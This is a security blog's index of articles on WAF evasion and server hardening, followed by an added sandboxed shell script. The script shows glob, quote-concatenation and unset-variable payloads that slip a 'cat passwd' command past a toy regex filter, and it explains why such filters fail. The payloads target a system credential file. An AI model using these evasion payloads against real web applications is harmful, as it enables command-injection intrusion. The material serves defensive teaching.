theMiddle

How To Exploit PHP Remotely To Bypass Filters & WAF Rules (Jan 6, 2019)
In the last three articles I have focused on how to bypass WAF rule sets in order to exploit a remote command execution. In this…

Web Application Firewall (WAF) Evasion Techniques #3 (Jan 6, 2019)
This article explores how to use an uninitialized Bash variable to bypass WAF regular-expression-based filters and pattern matching. Let's…

DNSBL: Not just for spam (Aug 12, 2018)
Using DNS to block botnets, spammers and Tor with Nginx, Lua, ModSecurity and FakeDNS

AppArmor: Say Goodbye to Remote Command Execution (Jul 3, 2018)
How to kill RCE and RFI directly on the php-fpm process. Let's do a test exploiting Drupalgeddon2.

Building A HackTheBox FluxCapacitor (May 20, 2018)
What I learned making this box for HTB

PHP SSRF Techniques (Mar 1, 2018)
How to bypass filter_var(), preg_match() and parse_url()

Web Application Firewall (WAF) Evasion Techniques #2 (Jan 3, 2018)
String concatenation in a remote command execution payload lets you bypass firewall rules (Sucuri, ModSecurity)

Detecting human users: Is there a way to block enumeration, fuzz or web scan? (Dec 27, 2017)
No, you won't be able to block them totally, but you would be surprised how stupid some bots are! Nginx + Lua FTW.

Web Application Firewall (WAF) Evasion Techniques (Dec 8, 2017)
I can read your passwd file with: "/???/??t /???/??ss??". Having fun with Sucuri WAF, ModSecurity, Paranoia Level and more…

ModSecurity + Elasticsearch + Kibana (Nov 14, 2017)
How to store ModSecurity audit logs in Elasticsearch and how to make searches and reports using Kibana
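The three WAF evasion teasers above (wildcards in "/???/??t /???/??ss??", string concatenation, and an uninitialized Bash variable) name the trick but not the mechanics. The script below is an added example, not code from any of the listed articles: a toy regex rule stands in for a real WAF signature, and each payload is run through `sh -c` inside a scratch directory constructed by the script, with relative `bin/cat` and `etc/passwd` standing in for `/bin/cat` and `/etc/passwd` so nothing on the host is touched. The rule, the directory layout and the wrapper `bin/cat` are all assumptions made for the demonstration.

```shell
#!/bin/sh
# Added example, not code from the listed articles. Shows why a
# pattern-matching filter that inspects the command string never sees the
# tokens the shell later produces from wildcards, quote-joined fragments or
# an unset variable. Runs entirely inside a throwaway directory.

# Toy signature (an assumption standing in for a real rule set): flag any
# command string containing "cat", whitespace, and "passwd" further on.
waf_verdict() {
    if printf '%s' "$1" | grep -Eq 'cat[[:space:]]+.*passwd'; then
        echo blocked
    else
        echo allowed
    fi
}

# Build a constructed tree mimicking bin/ and etc/ and print its path.
# bin/cat is a wrapper so that the glob ???/??t resolves to exactly one file.
make_sandbox() {
    sb=$(mktemp -d)
    mkdir -p "$sb/bin" "$sb/etc"
    printf 'root:x:0:0:root:/root:/bin/sh\n' > "$sb/etc/passwd"
    printf '#!/bin/sh\nexec cat "$@"\n' > "$sb/bin/cat"
    chmod +x "$sb/bin/cat"
    printf '%s' "$sb"
}

# Execute a payload string with the sandbox as working directory, the way a
# vulnerable system()-style call hands it to /bin/sh -c.
run_payload() {
    (cd "$1" && sh -c "$2")
}

# Relative paths stand in for /bin/cat and /etc/passwd from the teaser.
PLAIN='cat etc/passwd'                 # the obvious payload: blocked
WILDCARD='???/??t ???/??ss??'          # globs expand to: bin/cat etc/passwd
CONCAT="c'a't etc/pas''swd"            # quotes join fragments into: cat etc/passwd
UNSETVAR='cat$u etc/pas${u}swd'        # $u is unset and expands to nothing

main() {
    sb=$(make_sandbox)
    for p in "$PLAIN" "$WILDCARD" "$CONCAT" "$UNSETVAR"; do
        printf '%-28s -> %s\n' "$p" "$(waf_verdict "$p")"
        if [ "$(waf_verdict "$p")" = allowed ]; then
            run_payload "$sb" "$p"
        fi
    done
    rm -rf "$sb"
}

main
```

The practical lesson for the defensive side is the same one the teasers point at: a signature that matches the literal command text is checking the wrong layer, since the shell rewrites the string after the filter has approved it. Blocking the shell metacharacters themselves (`?`, `*`, quotes, `$`) or confining the process with something like AppArmor, as a later post in the list describes, is what actually removes the gap.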